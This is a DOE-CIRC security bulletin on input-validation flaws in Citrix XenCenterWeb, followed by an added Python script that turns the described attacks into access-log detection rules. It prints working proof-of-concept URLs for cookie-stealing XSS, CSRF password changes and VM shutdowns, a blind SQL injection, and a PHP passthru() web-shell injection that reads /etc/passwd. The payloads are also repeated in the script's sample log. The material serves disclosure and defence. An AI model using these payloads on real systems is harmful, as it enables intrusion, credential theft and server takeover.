DOE-CIRC TECHNICAL BULLETIN

T-180: Citrix XenCenterWeb Multiple Input Validation Vulnerabilities

July 9, 2009 14:00 GMT

PROBLEM: Citrix XenCenterWeb is vulnerable to cross site scripting, SQL injection and remote command execution vulnerabilities.
PLATFORM: Citrix XenCenterWeb 0
ABSTRACT: Due to poor validation of some user controlled inputs, a variety of attacks against the application and the underlying server are possible. Cross-site scripting, cross-site request forgery, SQL injection and remote command execution attack vectors were identified.

LINKS:
  DOE-CIRC BULLETIN: http://www.doecirc.energy.gov/bulletins/t-180.shtml
  OTHER LINKS:
    SecurityFocus: http://www.securityfocus.com/bid/35592/info
    Security Tracker: http://securitytracker.com/alerts/2009/Jul/1022520.html
    Juniper Networks: http://www.juniper.net/security/auto/vulnerabilities/vuln35592.html

IMPACT ASSESSMENT: This risk is high. Exploiting these issues could allow an attacker to execute arbitrary code, perform unauthorized actions, steal cookie-based authentication credentials, compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.

Discussion:
Citrix XenCenterWeb is a web interface for Citrix XenServer environment management. Users of XenCenterWeb are able to see a list of Virtual Machines in the Resource Pool, perform life-cycle actions (start, shutdown, restart, etc.), get basic information about the hosts in the Resource Pools and about the VMs, and also connect to the console of the VMs. Due to poor validation of some user controlled inputs, a variety of attacks against the application and the underlying server are possible. Cross-site scripting, cross-site request forgery, SQL injection and remote command execution attack vectors were identified as well. XSS and CSRF attacks can be performed on the virtual appliance itself, while the others require the PHP parameter magic_quotes_gpc to be off on the web server.

Vulnerability Details:
(a) Cross-site Scripting (XSS) and Cross-site Request Forgery (CSRF)
With the default PHP configuration (register_globals=Off and magic_quotes_gpc=On), both XSS and CSRF attacks can be executed. The first XSS attack exploits the lack of sanitization in the username parameter in edituser.php script and requires the victim to be able to access configuration scripts: 
https://xencenterweb.loc/config/edituser.php?username=1(script)alert(document.cookie)(/script)
Under the same conditions, a CSRF attack can be executed to change the password of an arbitrary user:
https://xencenterweb.loc/config/changepw.php?username=[victim_username]&newpass=[attacker's_chosen_pwd]
Another CSRF attack can hard stop a VM of the attacker's choice:
https://xencenterweb.loc/hardstopvm.php?stop_vmref=[VMref]&stop_vmname=[VMname]
Other XSS vulnerabilities afflict scripts which are accessible by anyone:
https://xencenterweb.loc/console.php?location=1">(script)alert(document.cookie)(/script)<"&vmname=myVM
https://xencenterweb.loc/console.php?location=1&sessionid=1">(script)alert(123)(/script)<"&vmname=myVM
https://xencenterweb.loc/console.php?location=1&sessionid=1&vmname=myVM(script)alert(123)(/script)
https://xencenterweb.loc/forcerestart.php?vmrefid=1">(script)alert(123)(/script)<"&vmname=myVM
https://xencenterweb.loc/forcerestart.php?vmrefid=1&vmname=myVM">(script)alert(123)(/script)<"
https://xencenterweb.loc/forcesd.php?vmrefid=1&vmname=myVM">(script)alert(123)(/script)<"
https://xencenterweb.loc/forcesd.php?vmrefid=1">(script)alert(123)(/script)<"&vmname=myVM

(b) SQL Injection
The username parameter in the login.php script is vulnerable to a Blind SQL Injection attack. An attacker can retrieve the whole database schema through specially crafted requests. Here is an example proof of concept:
https://xencenterweb.loc/login.php?username=user' UNION SELECT if(user() LIKE 'root@%', benchmark(1000000,sha1('test')), 'false')/*
Obviously, other high profile attacks can be performed through this attack vector.

(c) Remote Command Execution
An attacker could write arbitrary data into the file /usr/local/lib/php/include/config.ini.php through the file /var/www/config/writeconfig.php. Due to this insecure behavior, arbitrary commands can be executed on the machine. If a victim with the proper authorization follows this link:
https://xencenterweb.loc/config/writeconfig.php?pool1='; (?php $cmd = $_REQUEST['cmd']; passthru($cmd); ?) (?php $xen = '
or this URL encoded version:
https://xencenterweb.loc/config/writeconfig.php?pool1=%27%3B%20%3F%3E%20%3C%3Fphp%20%24cmd%20%3D%20%24_REQUEST%5B%27cmd%27%5D%3B%20passthru%28%24cmd%29%3B%20%3F%3E%20%3C%3Fphp%20%24xen%20%3D%20%27
an attacker can then simply execute commands on the system through the console.php file:
https://xencenterweb.loc/console.php?cmd=cat%20/etc/passwd;

*** EXPLOIT ***
Attackers may exploit these issues through a common browser as explained above.

Solution:
No patch is currently provided by Citrix, and the application download has been removed. Citrix officially stated that "the tool was created to demonstrate how the SDK could be used to create unique solutions. Customers currently using it should assess the risks of continued use in light of your findings and, if these prove to be unacceptable, discontinue usage".

*** WORKAROUNDS ***
Common web application workarounds apply, such as virtual patching from a web application firewall or similar solutions. However, most of the reported issues can be mitigated by running the application only inside the virtual appliance or on properly configured web servers.
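As an added example (not code from the bulletin, from Secure Network or from Citrix), the following Python script turns the request patterns described under Vulnerability Details into detection rules and runs them over constructed access-log lines in Combined Log Format; the same classify_request() logic is the kind of virtual-patching rule a web application firewall or reverse proxy would apply in front of the application, as suggested in the workaround above. The host name xencenterweb.loc, the script paths and the parameter names come from the bulletin; the log lines, IP addresses, the TRUSTED_ORIGIN Referer check and the regular expressions are assumptions made for the example.

```python
"""Detection rules for the XenCenterWeb request patterns described in this
bulletin, run over constructed access-log lines (Combined Log Format).
Added example, not Citrix/DOE-CIRC code: script paths and parameter names
come from the bulletin; log lines, IPs and TRUSTED_ORIGIN are assumptions."""
import re
from urllib.parse import parse_qsl, urlsplit

TRUSTED_ORIGIN = "https://xencenterweb.loc/"  # the app's own origin (from the PoC URLs)

# Scripts the bulletin names as sinks for each attack class.
XSS_SCRIPTS = {"/config/edituser.php", "/console.php", "/forcerestart.php", "/forcesd.php"}
STATE_CHANGING = {"/config/changepw.php", "/hardstopvm.php", "/config/writeconfig.php"}
SQLI_SCRIPT = "/login.php"
RCE_WRITE_SCRIPT = "/config/writeconfig.php"
RCE_EXEC_SCRIPT = "/console.php"

SCRIPT_TAG = re.compile(r"<\s*/?\s*script\b", re.I)                  # reflected <script> payloads
SQLI = re.compile(r"'\s*(union|or|and)\b|/\*|benchmark\s*\(", re.I)   # quote-break + UNION / timing probe
PHP_TAG = re.compile(r"<\?php|\?>")                                    # PHP code aimed at config.ini.php

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>[A-Z]+) (?P<target>\S+) \S+" '
    r'(?P<status>\d{3}) \S+ "(?P<referer>[^"]*)" "(?P<ua>[^"]*)"$'
)


def classify_request(method, target, referer="-"):
    """Return the list of attack classes one request matches (empty list = benign)."""
    parts = urlsplit(target)
    path = parts.path.lower()
    # parse_qsl percent-decodes values, so the literal and URL-encoded forms of a
    # payload are judged identically (double encoding is not unwrapped here).
    params = dict(parse_qsl(parts.query, keep_blank_values=True))
    findings = []
    if path in XSS_SCRIPTS and any(SCRIPT_TAG.search(v) for v in params.values()):
        findings.append("xss")
    # A state-changing request whose Referer is not the app's own origin is how the
    # bulletin's CSRF links look in the log (heuristic only: Referer may be absent).
    if path in STATE_CHANGING and not referer.startswith(TRUSTED_ORIGIN):
        findings.append("csrf")
    if path == SQLI_SCRIPT and SQLI.search(params.get("username", "")):
        findings.append("sqli")
    if path == RCE_WRITE_SCRIPT and any(PHP_TAG.search(v) for v in params.values()):
        findings.append("rce-write")
    # console.php legitimately takes location/sessionid/vmname; a cmd parameter only
    # makes sense once the passthru() backdoor has been planted in config.ini.php.
    if path == RCE_EXEC_SCRIPT and "cmd" in params:
        findings.append("rce-exec")
    return findings


def scan_log(lines):
    """Return (ip, target, findings) for every log line that matches a rule."""
    hits = []
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue  # not Combined Log Format; skip rather than guess
        findings = classify_request(m["method"], m["target"], m["referer"])
        if findings:
            hits.append((m["ip"], m["target"], findings))
    return hits


# Constructed sample log: one benign request, one legitimate password change from
# the app's own form, and one request per vector from the bulletin (quotes and
# angle brackets percent-encoded as a browser would send them).
SAMPLE_LOG = [
    '10.0.0.5 - - [09/Jul/2009:14:00:01 +0000] "GET /index.php HTTP/1.1" 200 512 '
    '"https://xencenterweb.loc/login.php" "Mozilla/5.0"',
    '10.0.0.9 - - [09/Jul/2009:14:00:02 +0000] "GET /config/edituser.php?username=1'
    '%3Cscript%3Ealert(document.cookie)%3C/script%3E HTTP/1.1" 200 1024 "-" "Mozilla/5.0"',
    '10.0.0.9 - - [09/Jul/2009:14:00:03 +0000] "GET /config/changepw.php?username=admin'
    '&newpass=x HTTP/1.1" 302 0 "http://evil.example/" "Mozilla/5.0"',
    '10.0.0.5 - - [09/Jul/2009:14:00:04 +0000] "GET /config/changepw.php?username=bob'
    '&newpass=y HTTP/1.1" 302 0 "https://xencenterweb.loc/config/edituser.php?username=bob" "Mozilla/5.0"',
    '10.0.0.9 - - [09/Jul/2009:14:00:05 +0000] "GET /login.php?username=user%27%20UNION%20SELECT'
    '%20if(user()%20LIKE%20%27root@%25%27,benchmark(1000000,sha1(%27test%27)),%27false%27)/* '
    'HTTP/1.1" 200 300 "-" "Mozilla/5.0"',
    '10.0.0.9 - - [09/Jul/2009:14:00:06 +0000] "GET /config/writeconfig.php?pool1=%27%3B%20%3F%3E'
    '%20%3C%3Fphp%20%24cmd%20%3D%20%24_REQUEST%5B%27cmd%27%5D%3B%20passthru%28%24cmd%29%3B%20%3F%3E'
    '%20%3C%3Fphp%20%24xen%20%3D%20%27 HTTP/1.1" 200 100 "-" "Mozilla/5.0"',
    '10.0.0.9 - - [09/Jul/2009:14:00:07 +0000] "GET /console.php?cmd=cat%20/etc/passwd HTTP/1.1" '
    '200 2048 "-" "Mozilla/5.0"',
]

if __name__ == "__main__":
    for ip, target, findings in scan_log(SAMPLE_LOG):
        print(f"{ip}  {','.join(findings):<15} {target}")
```

Running the script flags five of the seven constructed lines and leaves the index request and the same-origin password change alone. Two design points matter for real use: the rules are tied to the specific sink scripts and parameters the bulletin names, so they stay quiet on the rest of the application, and the CSRF rule is a Referer heuristic that only narrows triage; the durable fix remains a per-session CSRF token on every state-changing script. Because the RCE vector leaves its footprint on disk, pairing these log rules with file-integrity monitoring of /usr/local/lib/php/include/config.ini.php gives a second, independent signal.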


DOE-CIRC wishes to acknowledge the contributions of Secure Network for the information contained in this bulletin.
DOE-CIRC services are available to DOE, DOE Contractors, and the NIH. DOE-CIRC can be contacted at:
    Voice:          866-941-2472
    E-mail:          doecirc@doecirc.energy.gov
    World Wide Web:  http://www.doecirc.energy.gov


UCRL-MI-119788